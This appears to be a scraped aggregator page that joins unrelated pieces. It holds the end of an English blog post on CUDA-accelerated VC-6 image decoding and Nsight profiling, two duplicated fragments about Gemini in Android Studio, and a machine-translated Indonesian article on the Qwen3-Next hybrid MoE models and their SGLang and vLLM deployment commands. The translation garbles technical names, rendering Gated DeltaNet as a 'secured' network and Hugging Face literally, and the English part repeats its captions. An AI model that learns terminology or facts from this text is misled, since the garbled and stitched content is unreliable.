  • When compared to the existing GPU implementation, the CUDA version is between 1.2x and 1.6x faster than OpenCL. In the future, CUDA will enable more access to dedicated hardware intrinsics that can be leveraged.
  • Efficiency improves with batching on all platforms, and we expect further uplift from a native batch decoder.

Profiling with Nsight and the road ahead

Nsight Systems shows the decode work split between CPU (bitstream parse, root nodes) and GPU (tile residual decode, reconstruction). The latency‑optimized single‑image path under‑utilizes the GPU and throughput mode is where CUDA shines. Three hotspots guided our plan:

  • Kernel‑launch overhead in upsampling chains: At low LoQs, small kernels interleave with launch overhead. CUDA Graphs prototypes significantly reduce inter‑kernel gaps. We’re also exploring kernel fusion across early LoQs whose intermediates are never consumed.
  • Kernel efficiency: Nsight Compute flagged branch divergence, register spills, and non‑coalesced IO in some stages. Cleaning these up should raise occupancy and throughput.
  • Kernel-level parallelism: Currently, each decode launches its own chain of kernels, which is subpar compared to scaling the launch grid dimension. A series of kernels is launched per image, which does not scale perfect due to a limit to concurrent kernels on the GPU.

Upsampling chains

A chain of upsampling kernels (Figure 5) reconstructs the image at successively higher LoQs.A chain of upsampling kernels (Figure 5) reconstructs the image at successively higher LoQs.
Figure 5.Upsampling kernel chains

A chain of upsampling kernels (Figure 5) reconstructs the image at successively higher LoQs. At lower LoQs, the proportion of useful computation (blue) versus overhead (white) is significant. Techniques such as CUDA graphs or kernel fusion can speed up ‌computation by reducing the overhead between each of these kernels.

The Nsight trace also shows low GPU utilization, due to the small grid dimensions. Especially the first upsample kernel only launches a single block, which will only leverage one streaming multiprocessor (SM). With 188 SMs on an RTX PRO 6000, decoding a single image essentially only uses 1/188th  of the GPU.

In theory, this would enable us to use the other 187/188th of the GPU to decode additional images in parallel. In practice, this is called “kernellevel parallelism”, and isn’t the best way to utilize an NVIDIA GPU.

Kernel-level parallelism

The Nsight Systems trace in Figure 6 shows three concurrent decoders launched as Python threads on CPU (bottom) and their corresponding GPU activity (top). Each decode (blue) runs on its own stream. The Nsight Systems trace in Figure 6 shows three concurrent decoders launched as Python threads on CPU (bottom) and their corresponding GPU activity (top). Each decode (blue) runs on its own stream.
Figure 6.Kernel-level parallelism

The Nsight Systems trace in Figure 6 shows three concurrent decoders launched as Python threads on CPU (bottom) and their corresponding GPU activity (top). Each decode (blue) runs on its own stream. While this enables the GPU scheduler to launch these kernels simultaneously, it’s more efficient to launch a single larger grid on the GPU. Kernel-level parallelism can lead to scheduling conflicts, resource contention, and there’s even a hard limit to concurrently executable kernels that depends on the compute capability. As another upside this significantly reduces CPU overhead seen from the three concurrent threads.

Conclusions

AI pipelines don’t just need faster models; they need data to match the rate at which AI is being processed. By aligning VC-6’s hierarchical, selective architecture with CUDA’s powerful parallelism, we can significantly accelerate the path from storage to tensor. This approach complements established libraries by providing an AI-native solution for workloads where selective LoQ/RoI decoding and GPU-resident data offer immediate advantages.

The CUDA implementation is a practical building block you can use today to make your data pipelines faster and more efficient. While the current alpha version already delivers benefits, ongoing collaboration with NVIDIA engineers on native batching and kernel optimizations promises to unlock even greater throughput. As a next step, this initial CUDA implementation will enable tighter integration with popular AI SDKs and data loading pipelines. If you’re building high-throughput, multimodal AI systems, now is the time to explore how VC-6 on CUDA can accelerate your workflows.

The VC-6 SDKs for CUDA (alpha), OpenCL, and CPU are available with C++ and Python APIs.

  • SDK and docs: Access the SDK Portal and documentation via V-Nova.
  • Trial access: Contact V-Nova at ai@v-nova.com for the CUDA alpha wheel and benchmark scripts
  • Samples on GitHub 

[ad_2]

Build High-Performance Vision AI Pipelines with NVIDIA CUDA-Accelerated VC-6

Blog Pengembang Android: Android Studio for Enterprises

[ad_1]

Gemini di Android Studio for Business: Kembangkan dengan percaya diri, didukung oleh AI

Diposting oleh Sandhya Mohan – Manajer Produk untuk memberdayakan pengembang Android di tempat kerja, kami senang mengumumkan penawaran baru Gemin …

blog-label-container”>

Android Studio for Enterprises

Gemini untuk perusahaan

[ad_2]

Blog Pengembang Android: Android Studio for Enterprises

Blog Pengembang Android: Gemini untuk Perusahaan

[ad_1]

Gemini di Android Studio for Business: Kembangkan dengan percaya diri, didukung oleh AI

Diposting oleh Sandhya Mohan – Manajer Produk untuk memberdayakan pengembang Android di tempat kerja, kami senang mengumumkan penawaran baru Gemin …

blog-label-container”>

Android Studio for Enterprises

Gemini untuk perusahaan

[ad_2]

Blog Pengembang Android: Gemini untuk Perusahaan

Model QWEN3-Next Open Source Baru Pratinjau Arsitektur MOE Hybrid Memberikan akurasi yang lebih baik dan pemrosesan paralel yang dipercepat di seluruh platform NVIDIA

[ad_1]

Ketika model AI tumbuh lebih besar dan memproses urutan teks yang lebih lama, efisiensi menjadi sama pentingnya dengan skala.

Untuk menampilkan apa yang berikutnya, Alibaba merilis dua model terbuka baru, QWEN3-Next 80B-A3B-Thinking dan QWEN3-Next 80B-A3B-instruct untuk mempratinjau campuran hybrid baru arsitektur para ahli (MOE) dengan riset dan komunitas pengembang.

Qwen3-next-80b-a3b-Thinking sekarang hidup di build.nvidia.com, memberikan pengembang akses instan untuk menguji kemampuan penalaran canggihnya secara langsung di UI atau melalui NVIDIA NIM API.

Arsitektur baru dari model QWEN3-Next ini dioptimalkan untuk panjang konteks yang panjang (> 260K token input) dan efisiensi parameter skala besar. Setiap model memiliki total parameter 80B, tetapi hanya 3B yang diaktifkan per token karena struktur MOE yang jarang, memberikan kekuatan model besar dengan efisiensi yang lebih kecil. Modul MOE memiliki 512 pakar yang dirutekan dan 1 ahli bersama, dengan 10 ahli diaktifkan per token.

Kinerja model MOE seperti QWEN3-Next, yang rute meminta antara 512 ahli yang berbeda, sangat tergantung pada komunikasi antar-GPU. NVLink generasi ke-5 Blackwell menyediakan 1,8 TB/s bandwidth GPU-ke-GPU langsung. Kain berkecepatan tinggi ini sangat penting untuk meminimalkan latensi selama proses perutean ahli, secara langsung diterjemahkan ke inferensi yang lebih cepat dan throughput token yang lebih tinggi di pabrik AI.

Ada 48 lapisan dalam model, setiap lapisan ke -4 menggunakan perhatian GQA sementara yang tersisa menggunakan perhatian linier baru. Model Bahasa Besar (LLM) menggunakan lapisan perhatian untuk menafsirkan dan memberikan kepentingan untuk setiap token dari urutan input. Tumpukan perangkat lunak yang kurang matang tidak memiliki primitif yang dioptimalkan sebelumnya untuk arsitektur baru atau fusi spesifik yang diperlukan untuk membuat pergantian konstan antara jenis perhatian menjadi efisien.

Diagram menunjukkan contoh bagaimana urutan input Diagram menunjukkan contoh bagaimana urutan input
Gambar 1. Representasi umum tentang bagaimana urutan input diuraikan dan ditimbang oleh transformator

Untuk mencapai kemampuan konteks input yang panjang, model ini memanfaatkan jaringan delta yang terjaga keamanannya dari NVIDIA Research and MIT. Deltanet yang terjaga keamanannya meningkatkan pemrosesan urutan fokus sehingga model dapat memproses teks super panjang secara efisien tanpa melayang atau melupakan apa yang penting. Ini memungkinkannya untuk memproses urutan yang sangat panjang secara efisien, dengan memori dan penskalaan perhitungan hampir secara linier dengan panjang urutan.

Selain inovasi arsitektur ini, model ini dapat dijalankan di Nvidia Hopper dan Blackwell untuk kinerja inferensi yang dioptimalkan. Arsitektur pemrograman CUDA yang fleksibel dari NVIDIA memungkinkan untuk eksperimen pendekatan baru dan unik, memungkinkan lapisan perhatian penuh dari model transformator tradisional dan lapisan perhatian linier dalam model QWEN3-Next. Ketika dijalankan pada NVIDIA, pendekatan hibrida yang terlihat pada model QWEN3-Next dapat menyebabkan keuntungan efisiensi, membuka jalan bagi generasi token yang lebih besar dan pendapatan untuk pabrik AI.

Diagram menunjukkan representasi dari 48 lapisan model, dari kiri ke kanan berisi kotak yang mewakili lapisan pertama, lapisan tengah mewakili 10 lapisan di tengah, dan lapisan paling kanan adalah lapisan luar. Setiap kotak lapisan berisi 3 lapisan perhatian linier dan satu lapisan perhatian penuh.Diagram menunjukkan representasi dari 48 lapisan model, dari kiri ke kanan berisi kotak yang mewakili lapisan pertama, lapisan tengah mewakili 10 lapisan di tengah, dan lapisan paling kanan adalah lapisan luar. Setiap kotak lapisan berisi 3 lapisan perhatian linier dan satu lapisan perhatian penuh.
Gambar 2. Diagram konfigurasi 48 lapisan dalam model

NVIDIA berkolaborasi dengan kerangka open source SGLANG dan VLLM untuk memungkinkan penyebaran model bagi masyarakat serta mengemas kedua model sebagai NVIDIA NIM. Pengembang dapat mengkonsumsi model terbuka terkemuka melalui wadah perangkat lunak perusahaan, tergantung pada kebutuhan mereka.

Menyebarkan dengan sgang

Pengguna yang menggunakan model dengan kerangka kerja melayani SGLang dapat menggunakan instruksi berikut. Lihat dokumentasi SGLang untuk informasi lebih lanjut dan opsi konfigurasi.

python3 -m sglang.launch_server --model Qwen/Qwen3-Next-80B-A3B-Instruct --tp 4

Menyebarkan dengan VLLM

Pengguna yang menggunakan model dengan kerangka kerja VLLM dapat menggunakan instruksi berikut. Lihat blog pengumuman VLLM untuk informasi lebih lanjut.

uv pip install vllm --extra-index-url https://wheels.vllm.ai/nightly --torch-backend=auto
vllm serve Qwen/Qwen3-Next-80B-A3B-Instruct -tp 4

Penempatan siap-produksi dengan NVIDIA NIM

Pengembang perusahaan dapat mencoba QWEN3-Next-80B-A3B bersama dengan sisa model QWEN secara gratis menggunakan titik akhir NIM Microservice yang di-host NVIDIA dalam katalog NVIDIA API. Layanan mikro NIM yang dikemas dan dioptimalkan untuk model juga akan segera diunduh.

Membangun Kekuatan Open Source AI

Arsitektur hybrid moe qwen3-next baru mendorong batas efisiensi dan penalaran, menandai kemajuan yang signifikan bagi masyarakat. Membuat model -model ini tersedia secara terbuka memberdayakan para peneliti dan pengembang di mana -mana untuk bereksperimen, membangun, dan mempercepat inovasi. Di NVIDIA, kami berbagi komitmen ini untuk open source melalui kontribusi seperti NEMO untuk manajemen siklus hidup AI, Nemotron LLMS, dan Cosmos World Foundation Models (WFMS). Kami bekerja bersama komunitas untuk memajukan keadaan AI. Bersama -sama, upaya ini memastikan bahwa masa depan model AI tidak hanya lebih kuat, tetapi lebih mudah diakses, transparan, dan kolaboratif.

Mulailah hari ini

Coba model pada router terbuka: qwen3-next-80b-a3b-thinking dan qwen3-next-80b-a3b-instruct atau unduh dari pemeluk wajah: qwen3-next-80b-a3b-thinking dan qwen3-nex-80b-a3b-instruct

[ad_2]

Model QWEN3-Next Open Source Baru Pratinjau Arsitektur MOE Hybrid Memberikan akurasi yang lebih baik dan pemrosesan paralel yang dipercepat di seluruh platform NVIDIA